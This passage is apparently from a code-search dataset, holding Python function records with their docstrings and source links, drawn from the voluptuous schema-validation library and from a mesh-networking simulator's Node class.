new_key = ckey(key_path, key)
except er.Invalid as e:
if len(e.path) > len(key_path):
raise
if not error or len(e.path) > len(error.path):
error = e
continue
# Backtracking is not performed once a key is selected, so if
# the value is invalid we immediately throw an exception.
exception_errors = []
# check if the key is marked for removal
is_remove = new_key is Remove
try:
cval = cvalue(key_path, value)
# include if it's not marked for removal
if not is_remove:
out[new_key] = cval
else:
remove_key = True
continue
except er.MultipleInvalid as e:
exception_errors.extend(e.errors)
except er.Invalid as e:
exception_errors.append(e)
if exception_errors:
if is_remove or remove_key:
continue
for err in exception_errors:
if len(err.path) <= len(key_path):
err.error_type = invalid_msg
errors.append(err)
# If there is a validation error for a required
# key, this means that the key was provided.
# Discard the required key so it does not
# create an additional, noisy exception.
required_keys.discard(skey)
break
# Key and value okay, mark as found in case it was
# a Required() field.
required_keys.discard(skey)
break
else:
if remove_key:
# remove key
continue
elif self.extra == ALLOW_EXTRA:
out[key] = value
elif self.extra != REMOVE_EXTRA:
errors.append(er.Invalid('extra keys not allowed', key_path))
# else REMOVE_EXTRA: ignore the key so it's removed from output
# for any required keys left that weren't found and don't have defaults:
for key in required_keys:
msg = key.msg if hasattr(key, 'msg') and key.msg else 'required key not provided'
errors.append(er.RequiredFieldInvalid(msg, path + [key]))
if errors:
raise er.MultipleInvalid(errors)
return out
return validate_mapping
def _compile_object(self, schema):
"""Validate an object.
Has the same behavior as dictionary validator but work with object
attributes.
For example:
>>> class Structure(object):
... def __init__(self, one=None, three=None):
... self.one = one
... self.three = three
...
>>> validate = Schema(Object({'one': 'two', 'three': 'four'}, cls=Structure))
>>> with raises(er.MultipleInvalid, "not a valid value for object value @ data['one']"):
... validate(Structure(one='three'))
"""
base_validate = self._compile_mapping(
schema, invalid_msg='object value')
def validate_object(path, data):
if schema.cls is not UNDEFINED and not isinstance(data, schema.cls):
raise er.ObjectInvalid('expected a {0!r}'.format(schema.cls), path)
iterable = _iterate_object(data)
iterable = ifilter(lambda item: item[1] is not None, iterable)
out = base_validate(path, iterable, {})
return type(data)(**out)
return validate_object
def _compile_dict(self, schema):
"""Validate a dictionary.
A dictionary schema can contain a set of values, or at most one
validator function/type.
A dictionary schema will only validate a dictionary:
>>> validate = Schema({})
>>> with raises(er.MultipleInvalid, 'expected a dictionary'):
... validate([])
An invalid dictionary value:
>>> validate = Schema({'one': 'two', 'three': 'four'})
>>> with raises(er.MultipleInvalid, "not a valid value for dictionary value @ data['one']"):
... validate({'one': 'three'})
An invalid key:
>>> with raises(er.MultipleInvalid, "extra keys not allowed @ data['two']"):
... validate({'two': 'three'})
Validation function, in this case the "int" type:
>>> validate = Schema({'one': 'two', 'three': 'four', int: str})
Valid integer input:
>>> validate({10: 'twenty'})
{10: 'twenty'}
By default, a "type" in the schema (in this case "int") will be used
purely to validate that the corresponding value is of that type. It
will not Coerce the value:
>>> with raises(er.MultipleInvalid, "extra keys not allowed @ data['10']"):
... validate({'10': 'twenty'})
Wrap them in the Coerce() function to achieve this:
>>> from voluptuous import Coerce
>>> validate = Schema({'one': 'two', 'three': 'four',
... Coerce(int): str})
>>> validate({'10': 'twenty'})
{10: 'twenty'}
Custom message for required key
>>> validate = Schema({Required('one', 'required'): 'two'})
>>> with raises(er.MultipleInvalid, "required @ data['one']"):
... validate({})
(This is to avoid unexpected surprises.)
Multiple errors for nested field in a dict:
>>> validate = Schema({
... 'adict': {
... 'strfield': str,
... 'intfield': int
... }
... })
>>> try:
... validate({
... 'adict': {
... 'strfield': 123,
... 'intfield': 'one'
... }
... })
... except er.MultipleInvalid as e:
... print(sorted(str(i) for i in e.errors)) # doctest: +NORMALIZE_WHITESPACE
["expected int for dictionary value @ data['adict']['intfield']",
"expected str for dictionary value @ data['adict']['strfield']"]
"""
base_validate = self._compile_mapping(
schema, invalid_msg='dictionary value')
groups_of_exclusion = {}
groups_of_inclusion = {}
for node in schema:
if isinstance(node, Exclusive):
g = groups_of_exclusion.setdefault(node.group_of_exclusion, [])
g.append(node)
elif isinstance(node, Inclusive):
g = groups_of_inclusion.setdefault(node.group_of_inclusion, [])
g.append(node)
def validate_dict(path, data):
if not isinstance(data, dict):
raise er.DictInvalid('expected a dictionary', path)
errors = []
for label, group in groups_of_exclusion.items():
exists = False
for exclusive in group:
if exclusive.schema in data:
if exists:
msg = exclusive.msg if hasattr(exclusive, 'msg') and exclusive.msg else \
"two or more values in the same group of exclusion '%s'" % label
next_path = path + [VirtualPathComponent(label)]
errors.append(er.ExclusiveInvalid(msg, next_path))
break
exists = True
if errors:
raise er.MultipleInvalid(errors)
for label, group in groups_of_inclusion.items():
included = [node.schema in data for node in group]
if any(included) and not all(included):
msg = "some but not all values in the same group of inclusion '%s'" % label
for g in group:
if hasattr(g, 'msg') and g.msg:
msg = g.msg
break
next_path = path + [VirtualPathComponent(label)]
errors.append(er.InclusiveInvalid(msg, next_path))
break
if errors:
raise er.MultipleInvalid(errors)
out = data.__class__()
return base_validate(path, iteritems(data), out)
return validate_dict
def _compile_sequence(self, schema, seq_type):
"""Validate a sequence type.
This is a sequence of valid values or validators tried in order.
>>> validator = Schema(['one', 'two', int])
>>> validator(['one'])
['one']
>>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
... validator([3.5])
>>> validator([1])
[1]
"""
_compiled = [self._compile(s) for s in schema]
seq_type_name = seq_type.__name__
def validate_sequence(path, data):
if not isinstance(data, seq_type):
raise er.SequenceTypeInvalid('expected a %s' % seq_type_name, path)
# Empty seq schema, allow any data.
if not schema:
if data:
raise er.MultipleInvalid([
er.ValueInvalid('not a valid value', [value]) for value in data
])
return data
out = []
invalid = None
errors = []
index_path = UNDEFINED
for i, value in enumerate(data):
index_path = path + [i]
invalid = None
for validate in _compiled:
try:
cval = validate(index_path, value)
if cval is not Remove: # do not include Remove values
out.append(cval)
break
except er.Invalid as e:
if len(e.path) > len(index_path):
raise
invalid = e
else:
errors.append(invalid)
if errors:
raise er.MultipleInvalid(errors)
if _isnamedtuple(data):
return type(data)(*out)
else:
return type(data)(out)
return validate_sequence
def _compile_tuple(self, schema):
"""Validate a tuple.
A tuple is a sequence of valid values or validators tried in order.
>>> validator = Schema(('one', 'two', int))
>>> validator(('one',))
('one',)
>>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
... validator((3.5,))
>>> validator((1,))
(1,)
"""
return self._compile_sequence(schema, tuple)
def _compile_list(self, schema):
"""Validate a list.
A list is a sequence of valid values or validators tried in order.
>>> validator = Schema(['one', 'two', int])
>>> validator(['one'])
['one']
>>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
... validator([3.5])
>>> validator([1])
[1]
"""
return self._compile_sequence(schema, list)
def extend(self, schema, required=None, extra=None):
"""Create a new `Schema` by merging this and the provided `schema`.
Neither this `Schema` nor the provided `schema` are modified. The
resulting `Schema` inherits the `required` and `extra` parameters of
this, unless overridden.
Both schemas must be dictionary-based.
:param schema: dictionary to extend this `Schema` with
:param required: if set, overrides `required` of this `Schema`
:param extra: if set, overrides `extra` of this `Schema`
"""
assert type(self.schema) == dict and type(schema) == dict, 'Both schemas must be dictionary-based'
result = self.schema.copy()
# returns the key that may have been passed as arugment to Marker constructor
def key_literal(key):
return (key.schema if isinstance(key, Marker) else key)
# build a map that takes the key literals to the needed objects
# literal -> Required|Optional|literal
result_key_map = dict((key_literal(key), key) for key in result)
# for each item in the extension schema, replace duplicates
# or add new keys
for key, value in iteritems(schema):
# if the key is already in the dictionary, we need to replace it
# transform key to literal before checking presence
if key_literal(key) in result_key_map:
result_key = result_key_map[key_literal(key)]
result_value = result[result_key]
# if both are dictionaries, we need to extend recursively
# create the new extended sub schema, then remove the old key and add the new one
if type(result_value) == dict and type(value) == dict:
new_value = Schema(result_value).extend(value).schema
del result[result_key]
result[key] = new_value
# one or the other or both are not sub-schemas, simple replacement is fine
# remove old key and add new one
else:
del result[result_key]
result[key] = value
# key is new and can simply be added
else:
result[key] = value
# recompile and send old object
result_cls = type(self)
result_required = (required if required is not None else self.required)
result_extra = (extra if extra is not None else self.extra)
return result_cls(result, required=result_required, extra=result_extra)
|
alecthomas/voluptuous | voluptuous/schema_builder.py | Schema.extend | python | def extend(self, schema, required=None, extra=None):
assert type(self.schema) == dict and type(schema) == dict, 'Both schemas must be dictionary-based'
result = self.schema.copy()
# returns the key that may have been passed as arugment to Marker constructor
def key_literal(key):
return (key.schema if isinstance(key, Marker) else key)
# build a map that takes the key literals to the needed objects
# literal -> Required|Optional|literal
result_key_map = dict((key_literal(key), key) for key in result)
# for each item in the extension schema, replace duplicates
# or add new keys
for key, value in iteritems(schema):
# if the key is already in the dictionary, we need to replace it
# transform key to literal before checking presence
if key_literal(key) in result_key_map:
result_key = result_key_map[key_literal(key)]
result_value = result[result_key]
# if both are dictionaries, we need to extend recursively
# create the new extended sub schema, then remove the old key and add the new one
if type(result_value) == dict and type(value) == dict:
new_value = Schema(result_value).extend(value).schema
del result[result_key]
result[key] = new_value
# one or the other or both are not sub-schemas, simple replacement is fine
# remove old key and add new one
else:
del result[result_key]
result[key] = value
# key is new and can simply be added
else:
result[key] = value
# recompile and send old object
result_cls = type(self)
result_required = (required if required is not None else self.required)
result_extra = (extra if extra is not None else self.extra)
return result_cls(result, required=result_required, extra=result_extra) | Create a new `Schema` by merging this and the provided `schema`.
Neither this `Schema` nor the provided `schema` are modified. The
resulting `Schema` inherits the `required` and `extra` parameters of
this, unless overridden.
Both schemas must be dictionary-based.
:param schema: dictionary to extend this `Schema` with
:param required: if set, overrides `required` of this `Schema`
:param extra: if set, overrides `extra` of this `Schema` | train | https://github.com/alecthomas/voluptuous/blob/36c8c11e2b7eb402c24866fa558473661ede9403/voluptuous/schema_builder.py#L725-L782 | [
"def iteritems(d):\n return d.items()\n",
"def extend(self, schema, required=None, extra=None):\n \"\"\"Create a new `Schema` by merging this and the provided `schema`.\n\n Neither this `Schema` nor the provided `schema` are modified. The\n resulting `Schema` inherits the `required` and `extra` parame... | class Schema(object):
"""A validation schema.
The schema is a Python tree-like structure where nodes are pattern
matched against corresponding trees of values.
Nodes can be values, in which case a direct comparison is used, types,
in which case an isinstance() check is performed, or callables, which will
validate and optionally convert the value.
We can equate schemas also.
For Example:
>>> v = Schema({Required('a'): unicode})
>>> v1 = Schema({Required('a'): unicode})
>>> v2 = Schema({Required('b'): unicode})
>>> assert v == v1
>>> assert v != v2
"""
_extra_to_name = {
REMOVE_EXTRA: 'REMOVE_EXTRA',
ALLOW_EXTRA: 'ALLOW_EXTRA',
PREVENT_EXTRA: 'PREVENT_EXTRA',
}
def __init__(self, schema, required=False, extra=PREVENT_EXTRA):
"""Create a new Schema.
:param schema: Validation schema. See :module:`voluptuous` for details.
:param required: Keys defined in the schema must be in the data.
:param extra: Specify how extra keys in the data are treated:
- :const:`~voluptuous.PREVENT_EXTRA`: to disallow any undefined
extra keys (raise ``Invalid``).
- :const:`~voluptuous.ALLOW_EXTRA`: to include undefined extra
keys in the output.
- :const:`~voluptuous.REMOVE_EXTRA`: to exclude undefined extra keys
from the output.
- Any value other than the above defaults to
:const:`~voluptuous.PREVENT_EXTRA`
"""
self.schema = schema
self.required = required
self.extra = int(extra) # ensure the value is an integer
self._compiled = self._compile(schema)
@classmethod
def infer(cls, data, **kwargs):
"""Create a Schema from concrete data (e.g. an API response).
For example, this will take a dict like:
{
'foo': 1,
'bar': {
'a': True,
'b': False
},
'baz': ['purple', 'monkey', 'dishwasher']
}
And return a Schema:
{
'foo': int,
'bar': {
'a': bool,
'b': bool
},
'baz': [str]
}
Note: only very basic inference is supported.
"""
def value_to_schema_type(value):
if isinstance(value, dict):
if len(value) == 0:
return dict
return {k: value_to_schema_type(v)
for k, v in iteritems(value)}
if isinstance(value, list):
if len(value) == 0:
return list
else:
return [value_to_schema_type(v)
for v in value]
return type(value)
return cls(value_to_schema_type(data), **kwargs)
def __eq__(self, other):
if not isinstance(other, Schema):
return False
return other.schema == self.schema
def __ne__(self, other):
return not (self == other)
def __str__(self):
return str(self.schema)
def __repr__(self):
return "<Schema(%s, extra=%s, required=%s) object at 0x%x>" % (
self.schema, self._extra_to_name.get(self.extra, '??'),
self.required, id(self))
def __call__(self, data):
"""Validate data against this schema."""
try:
return self._compiled([], data)
except er.MultipleInvalid:
raise
except er.Invalid as e:
raise er.MultipleInvalid([e])
# return self.validate([], self.schema, data)
def _compile(self, schema):
if schema is Extra:
return lambda _, v: v
if schema is Self:
return lambda p, v: self._compiled(p, v)
elif hasattr(schema, "__voluptuous_compile__"):
return schema.__voluptuous_compile__(self)
if isinstance(schema, Object):
return self._compile_object(schema)
if isinstance(schema, _Mapping):
return self._compile_dict(schema)
elif isinstance(schema, list):
return self._compile_list(schema)
elif isinstance(schema, tuple):
return self._compile_tuple(schema)
elif isinstance(schema, (frozenset, set)):
return self._compile_set(schema)
type_ = type(schema)
if inspect.isclass(schema):
type_ = schema
if type_ in (bool, bytes, int, long, str, unicode, float, complex, object,
list, dict, type(None)) or callable(schema):
return _compile_scalar(schema)
raise er.SchemaError('unsupported schema data type %r' %
type(schema).__name__)
def _compile_mapping(self, schema, invalid_msg=None):
"""Create validator for given mapping."""
invalid_msg = invalid_msg or 'mapping value'
# Keys that may be required
all_required_keys = set(key for key in schema
if key is not Extra and
((self.required and not isinstance(key, (Optional, Remove))) or
isinstance(key, Required)))
# Keys that may have defaults
all_default_keys = set(key for key in schema
if isinstance(key, Required) or
isinstance(key, Optional))
_compiled_schema = {}
for skey, svalue in iteritems(schema):
new_key = self._compile(skey)
new_value = self._compile(svalue)
_compiled_schema[skey] = (new_key, new_value)
candidates = list(_iterate_mapping_candidates(_compiled_schema))
# After we have the list of candidates in the correct order, we want to apply some optimization so that each
# key in the data being validated will be matched against the relevant schema keys only.
# No point in matching against different keys
additional_candidates = []
candidates_by_key = {}
for skey, (ckey, cvalue) in candidates:
if type(skey) in primitive_types:
candidates_by_key.setdefault(skey, []).append((skey, (ckey, cvalue)))
elif isinstance(skey, Marker) and type(skey.schema) in primitive_types:
candidates_by_key.setdefault(skey.schema, []).append((skey, (ckey, cvalue)))
else:
# These are wildcards such as 'int', 'str', 'Remove' and others which should be applied to all keys
additional_candidates.append((skey, (ckey, cvalue)))
def validate_mapping(path, iterable, out):
required_keys = all_required_keys.copy()
# Build a map of all provided key-value pairs.
# The type(out) is used to retain ordering in case a ordered
# map type is provided as input.
key_value_map = type(out)()
for key, value in iterable:
key_value_map[key] = value
# Insert default values for non-existing keys.
for key in all_default_keys:
if not isinstance(key.default, Undefined) and \
key.schema not in key_value_map:
# A default value has been specified for this missing
# key, insert it.
key_value_map[key.schema] = key.default()
error = None
errors = []
for key, value in key_value_map.items():
key_path = path + [key]
remove_key = False
# Optimization. Validate against the matching key first, then fallback to the rest
relevant_candidates = itertools.chain(candidates_by_key.get(key, []), additional_candidates)
# compare each given key/value against all compiled key/values
# schema key, (compiled key, compiled value)
for skey, (ckey, cvalue) in relevant_candidates:
try:
new_key = ckey(key_path, key)
except er.Invalid as e:
if len(e.path) > len(key_path):
raise
if not error or len(e.path) > len(error.path):
error = e
continue
# Backtracking is not performed once a key is selected, so if
# the value is invalid we immediately throw an exception.
exception_errors = []
# check if the key is marked for removal
is_remove = new_key is Remove
try:
cval = cvalue(key_path, value)
# include if it's not marked for removal
if not is_remove:
out[new_key] = cval
else:
remove_key = True
continue
except er.MultipleInvalid as e:
exception_errors.extend(e.errors)
except er.Invalid as e:
exception_errors.append(e)
if exception_errors:
if is_remove or remove_key:
continue
for err in exception_errors:
if len(err.path) <= len(key_path):
err.error_type = invalid_msg
errors.append(err)
# If there is a validation error for a required
# key, this means that the key was provided.
# Discard the required key so it does not
# create an additional, noisy exception.
required_keys.discard(skey)
break
# Key and value okay, mark as found in case it was
# a Required() field.
required_keys.discard(skey)
break
else:
if remove_key:
# remove key
continue
elif self.extra == ALLOW_EXTRA:
out[key] = value
elif self.extra != REMOVE_EXTRA:
errors.append(er.Invalid('extra keys not allowed', key_path))
# else REMOVE_EXTRA: ignore the key so it's removed from output
# for any required keys left that weren't found and don't have defaults:
for key in required_keys:
msg = key.msg if hasattr(key, 'msg') and key.msg else 'required key not provided'
errors.append(er.RequiredFieldInvalid(msg, path + [key]))
if errors:
raise er.MultipleInvalid(errors)
return out
return validate_mapping
def _compile_object(self, schema):
"""Validate an object.
Has the same behavior as dictionary validator but work with object
attributes.
For example:
>>> class Structure(object):
... def __init__(self, one=None, three=None):
... self.one = one
... self.three = three
...
>>> validate = Schema(Object({'one': 'two', 'three': 'four'}, cls=Structure))
>>> with raises(er.MultipleInvalid, "not a valid value for object value @ data['one']"):
... validate(Structure(one='three'))
"""
base_validate = self._compile_mapping(
schema, invalid_msg='object value')
def validate_object(path, data):
if schema.cls is not UNDEFINED and not isinstance(data, schema.cls):
raise er.ObjectInvalid('expected a {0!r}'.format(schema.cls), path)
iterable = _iterate_object(data)
iterable = ifilter(lambda item: item[1] is not None, iterable)
out = base_validate(path, iterable, {})
return type(data)(**out)
return validate_object
def _compile_dict(self, schema):
"""Validate a dictionary.
A dictionary schema can contain a set of values, or at most one
validator function/type.
A dictionary schema will only validate a dictionary:
>>> validate = Schema({})
>>> with raises(er.MultipleInvalid, 'expected a dictionary'):
... validate([])
An invalid dictionary value:
>>> validate = Schema({'one': 'two', 'three': 'four'})
>>> with raises(er.MultipleInvalid, "not a valid value for dictionary value @ data['one']"):
... validate({'one': 'three'})
An invalid key:
>>> with raises(er.MultipleInvalid, "extra keys not allowed @ data['two']"):
... validate({'two': 'three'})
Validation function, in this case the "int" type:
>>> validate = Schema({'one': 'two', 'three': 'four', int: str})
Valid integer input:
>>> validate({10: 'twenty'})
{10: 'twenty'}
By default, a "type" in the schema (in this case "int") will be used
purely to validate that the corresponding value is of that type. It
will not Coerce the value:
>>> with raises(er.MultipleInvalid, "extra keys not allowed @ data['10']"):
... validate({'10': 'twenty'})
Wrap them in the Coerce() function to achieve this:
>>> from voluptuous import Coerce
>>> validate = Schema({'one': 'two', 'three': 'four',
... Coerce(int): str})
>>> validate({'10': 'twenty'})
{10: 'twenty'}
Custom message for required key
>>> validate = Schema({Required('one', 'required'): 'two'})
>>> with raises(er.MultipleInvalid, "required @ data['one']"):
... validate({})
(This is to avoid unexpected surprises.)
Multiple errors for nested field in a dict:
>>> validate = Schema({
... 'adict': {
... 'strfield': str,
... 'intfield': int
... }
... })
>>> try:
... validate({
... 'adict': {
... 'strfield': 123,
... 'intfield': 'one'
... }
... })
... except er.MultipleInvalid as e:
... print(sorted(str(i) for i in e.errors)) # doctest: +NORMALIZE_WHITESPACE
["expected int for dictionary value @ data['adict']['intfield']",
"expected str for dictionary value @ data['adict']['strfield']"]
"""
base_validate = self._compile_mapping(
schema, invalid_msg='dictionary value')
groups_of_exclusion = {}
groups_of_inclusion = {}
for node in schema:
if isinstance(node, Exclusive):
g = groups_of_exclusion.setdefault(node.group_of_exclusion, [])
g.append(node)
elif isinstance(node, Inclusive):
g = groups_of_inclusion.setdefault(node.group_of_inclusion, [])
g.append(node)
def validate_dict(path, data):
if not isinstance(data, dict):
raise er.DictInvalid('expected a dictionary', path)
errors = []
for label, group in groups_of_exclusion.items():
exists = False
for exclusive in group:
if exclusive.schema in data:
if exists:
msg = exclusive.msg if hasattr(exclusive, 'msg') and exclusive.msg else \
"two or more values in the same group of exclusion '%s'" % label
next_path = path + [VirtualPathComponent(label)]
errors.append(er.ExclusiveInvalid(msg, next_path))
break
exists = True
if errors:
raise er.MultipleInvalid(errors)
for label, group in groups_of_inclusion.items():
included = [node.schema in data for node in group]
if any(included) and not all(included):
msg = "some but not all values in the same group of inclusion '%s'" % label
for g in group:
if hasattr(g, 'msg') and g.msg:
msg = g.msg
break
next_path = path + [VirtualPathComponent(label)]
errors.append(er.InclusiveInvalid(msg, next_path))
break
if errors:
raise er.MultipleInvalid(errors)
out = data.__class__()
return base_validate(path, iteritems(data), out)
return validate_dict
def _compile_sequence(self, schema, seq_type):
"""Validate a sequence type.
This is a sequence of valid values or validators tried in order.
>>> validator = Schema(['one', 'two', int])
>>> validator(['one'])
['one']
>>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
... validator([3.5])
>>> validator([1])
[1]
"""
_compiled = [self._compile(s) for s in schema]
seq_type_name = seq_type.__name__
def validate_sequence(path, data):
if not isinstance(data, seq_type):
raise er.SequenceTypeInvalid('expected a %s' % seq_type_name, path)
# Empty seq schema, allow any data.
if not schema:
if data:
raise er.MultipleInvalid([
er.ValueInvalid('not a valid value', [value]) for value in data
])
return data
out = []
invalid = None
errors = []
index_path = UNDEFINED
for i, value in enumerate(data):
index_path = path + [i]
invalid = None
for validate in _compiled:
try:
cval = validate(index_path, value)
if cval is not Remove: # do not include Remove values
out.append(cval)
break
except er.Invalid as e:
if len(e.path) > len(index_path):
raise
invalid = e
else:
errors.append(invalid)
if errors:
raise er.MultipleInvalid(errors)
if _isnamedtuple(data):
return type(data)(*out)
else:
return type(data)(out)
return validate_sequence
def _compile_tuple(self, schema):
"""Validate a tuple.
A tuple is a sequence of valid values or validators tried in order.
>>> validator = Schema(('one', 'two', int))
>>> validator(('one',))
('one',)
>>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
... validator((3.5,))
>>> validator((1,))
(1,)
"""
return self._compile_sequence(schema, tuple)
def _compile_list(self, schema):
"""Validate a list.
A list is a sequence of valid values or validators tried in order.
>>> validator = Schema(['one', 'two', int])
>>> validator(['one'])
['one']
>>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
... validator([3.5])
>>> validator([1])
[1]
"""
return self._compile_sequence(schema, list)
def _compile_set(self, schema):
"""Validate a set.
A set is an unordered collection of unique elements.
>>> validator = Schema({int})
>>> validator(set([42])) == set([42])
True
>>> with raises(er.Invalid, 'expected a set'):
... validator(42)
>>> with raises(er.MultipleInvalid, 'invalid value in set'):
... validator(set(['a']))
"""
type_ = type(schema)
type_name = type_.__name__
def validate_set(path, data):
if not isinstance(data, type_):
raise er.Invalid('expected a %s' % type_name, path)
_compiled = [self._compile(s) for s in schema]
errors = []
for value in data:
for validate in _compiled:
try:
validate(path, value)
break
except er.Invalid:
pass
else:
invalid = er.Invalid('invalid value in %s' % type_name, path)
errors.append(invalid)
if errors:
raise er.MultipleInvalid(errors)
return data
return validate_set
|
pirate/mesh-networking | mesh/node.py | Node._generate_MAC | python | def _generate_MAC(segments=6, segment_length=2, delimiter=":", charset="0123456789abcdef"):
addr = []
for _ in range(segments):
sub = ''.join(random.choice(charset) for _ in range(segment_length))
addr.append(sub)
return delimiter.join(addr) | generate a non-guaranteed-unique mac address | train | https://github.com/pirate/mesh-networking/blob/e8da35d2ecded6930cf2180605bf28479ee555c7/mesh/node.py#L57-L63 | null | class Node(threading.Thread):
"""a Node represents a computer. node.interfaces contains the list of network links the node is connected to.
Nodes process incoming traffic through their filters, then place packets in their inq for their Program to handle.
Programs process packets off the node's incoming queue, then send responses out through node's outbound filters,
and finally out to the right network interface.
"""
def __init__(self, interfaces=None, name="n1", promiscuous=False, mac_addr=None, Filters=(), Program=None):
threading.Thread.__init__(self)
self.name = name
self.interfaces = interfaces or []
self.keep_listening = True
self.promiscuous = promiscuous
self.mac_addr = mac_addr or self._generate_MAC(6, 2)
self.inq = defaultdict(Queue) # TODO: convert to bounded ring-buffer
self.filters = [LoopbackFilter()] + [F() for F in Filters] # initialize the filters that shape incoming and outgoing traffic before it hits the program
self.program = Program(node=self) if Program else None # init the program that will be processing incoming packets
def __repr__(self):
return "[{0}]".format(self.name)
def __str__(self):
return self.__repr__()
@staticmethod
def log(self, *args):
"""stdout and stderr for the node"""
print("%s %s" % (str(self).ljust(8), " ".join(str(x) for x in args)))
def stop(self):
self.keep_listening = False
if self.program:
self.program.stop()
self.join()
return True
### Runloop
def run(self):
"""runloop that gets triggered by node.start()
reads new packets off the link and feeds them to recv()
"""
if self.program:
self.program.start()
while self.keep_listening:
for interface in self.interfaces:
packet = interface.recv(self.mac_addr if not self.promiscuous else "00:00:00:00:00:00")
if packet:
self.recv(packet, interface)
time.sleep(0.01)
self.log("Stopped listening.")
### IO
def recv(self, packet, interface):
"""run incoming packet through the filters, then place it in its inq"""
# the packet is piped into the first filter, then the result of that into the second filter, etc.
for f in self.filters:
if not packet:
break
packet = f.tr(packet, interface)
if packet:
# if the packet wasn't dropped by a filter, log the recv and place it in the interface's inq
# self.log("IN ", str(interface).ljust(30), packet.decode())
self.inq[interface].put(packet)
def send(self, packet, interfaces=None):
"""write packet to given interfaces, default is broadcast to all interfaces"""
interfaces = interfaces or self.interfaces # default to all interfaces
interfaces = interfaces if hasattr(interfaces, '__iter__') else [interfaces]
for interface in interfaces:
for f in self.filters:
packet = f.tx(packet, interface) # run outgoing packet through the filters
if packet:
# if not dropped, log the transmit and pass it to the interface's send method
# self.log("OUT ", ("<"+",".join(i.name for i in interfaces)+">").ljust(30), packet.decode())
interface.send(packet)
|
pirate/mesh-networking | mesh/node.py | Node.run | python | def run(self):
if self.program:
self.program.start()
while self.keep_listening:
for interface in self.interfaces:
packet = interface.recv(self.mac_addr if not self.promiscuous else "00:00:00:00:00:00")
if packet:
self.recv(packet, interface)
time.sleep(0.01)
self.log("Stopped listening.") | runloop that gets triggered by node.start()
reads new packets off the link and feeds them to recv() | train | https://github.com/pirate/mesh-networking/blob/e8da35d2ecded6930cf2180605bf28479ee555c7/mesh/node.py#L78-L90 | [
"def log(self, *args):\n \"\"\"stdout and stderr for the node\"\"\"\n print(\"%s %s\" % (str(self).ljust(8), \" \".join(str(x) for x in args)))\n",
"def recv(self, packet, interface):\n \"\"\"run incoming packet through the filters, then place it in its inq\"\"\"\n # the packet is piped into the first... | class Node(threading.Thread):
"""a Node represents a computer. node.interfaces contains the list of network links the node is connected to.
Nodes process incoming traffic through their filters, then place packets in their inq for their Program to handle.
Programs process packets off the node's incoming queue, then send responses out through node's outbound filters,
and finally out to the right network interface.
"""
def __init__(self, interfaces=None, name="n1", promiscuous=False, mac_addr=None, Filters=(), Program=None):
threading.Thread.__init__(self)
self.name = name
self.interfaces = interfaces or []
self.keep_listening = True
self.promiscuous = promiscuous
self.mac_addr = mac_addr or self._generate_MAC(6, 2)
self.inq = defaultdict(Queue) # TODO: convert to bounded ring-buffer
self.filters = [LoopbackFilter()] + [F() for F in Filters] # initialize the filters that shape incoming and outgoing traffic before it hits the program
self.program = Program(node=self) if Program else None # init the program that will be processing incoming packets
def __repr__(self):
return "[{0}]".format(self.name)
def __str__(self):
return self.__repr__()
@staticmethod
def _generate_MAC(segments=6, segment_length=2, delimiter=":", charset="0123456789abcdef"):
"""generate a non-guaranteed-unique mac address"""
addr = []
for _ in range(segments):
sub = ''.join(random.choice(charset) for _ in range(segment_length))
addr.append(sub)
return delimiter.join(addr)
def log(self, *args):
"""stdout and stderr for the node"""
print("%s %s" % (str(self).ljust(8), " ".join(str(x) for x in args)))
def stop(self):
self.keep_listening = False
if self.program:
self.program.stop()
self.join()
return True
### Runloop
### IO
def recv(self, packet, interface):
"""run incoming packet through the filters, then place it in its inq"""
# the packet is piped into the first filter, then the result of that into the second filter, etc.
for f in self.filters:
if not packet:
break
packet = f.tr(packet, interface)
if packet:
# if the packet wasn't dropped by a filter, log the recv and place it in the interface's inq
# self.log("IN ", str(interface).ljust(30), packet.decode())
self.inq[interface].put(packet)
def send(self, packet, interfaces=None):
"""write packet to given interfaces, default is broadcast to all interfaces"""
interfaces = interfaces or self.interfaces # default to all interfaces
interfaces = interfaces if hasattr(interfaces, '__iter__') else [interfaces]
for interface in interfaces:
for f in self.filters:
packet = f.tx(packet, interface) # run outgoing packet through the filters
if packet:
# if not dropped, log the transmit and pass it to the interface's send method
# self.log("OUT ", ("<"+",".join(i.name for i in interfaces)+">").ljust(30), packet.decode())
interface.send(packet)
|
pirate/mesh-networking | mesh/node.py | Node.recv | python | def recv(self, packet, interface):
# the packet is piped into the first filter, then the result of that into the second filter, etc.
for f in self.filters:
if not packet:
break
packet = f.tr(packet, interface)
if packet:
# if the packet wasn't dropped by a filter, log the recv and place it in the interface's inq
# self.log("IN ", str(interface).ljust(30), packet.decode())
self.inq[interface].put(packet) | run incoming packet through the filters, then place it in its inq | train | https://github.com/pirate/mesh-networking/blob/e8da35d2ecded6930cf2180605bf28479ee555c7/mesh/node.py#L94-L104 | null | class Node(threading.Thread):
"""a Node represents a computer. node.interfaces contains the list of network links the node is connected to.
Nodes process incoming traffic through their filters, then place packets in their inq for their Program to handle.
Programs process packets off the node's incoming queue, then send responses out through node's outbound filters,
and finally out to the right network interface.
"""
def __init__(self, interfaces=None, name="n1", promiscuous=False, mac_addr=None, Filters=(), Program=None):
threading.Thread.__init__(self)
self.name = name
self.interfaces = interfaces or []
self.keep_listening = True
self.promiscuous = promiscuous
self.mac_addr = mac_addr or self._generate_MAC(6, 2)
self.inq = defaultdict(Queue) # TODO: convert to bounded ring-buffer
self.filters = [LoopbackFilter()] + [F() for F in Filters] # initialize the filters that shape incoming and outgoing traffic before it hits the program
self.program = Program(node=self) if Program else None # init the program that will be processing incoming packets
def __repr__(self):
return "[{0}]".format(self.name)
def __str__(self):
return self.__repr__()
@staticmethod
def _generate_MAC(segments=6, segment_length=2, delimiter=":", charset="0123456789abcdef"):
"""generate a non-guaranteed-unique mac address"""
addr = []
for _ in range(segments):
sub = ''.join(random.choice(charset) for _ in range(segment_length))
addr.append(sub)
return delimiter.join(addr)
def log(self, *args):
"""stdout and stderr for the node"""
print("%s %s" % (str(self).ljust(8), " ".join(str(x) for x in args)))
def stop(self):
self.keep_listening = False
if self.program:
self.program.stop()
self.join()
return True
### Runloop
def run(self):
"""runloop that gets triggered by node.start()
reads new packets off the link and feeds them to recv()
"""
if self.program:
self.program.start()
while self.keep_listening:
for interface in self.interfaces:
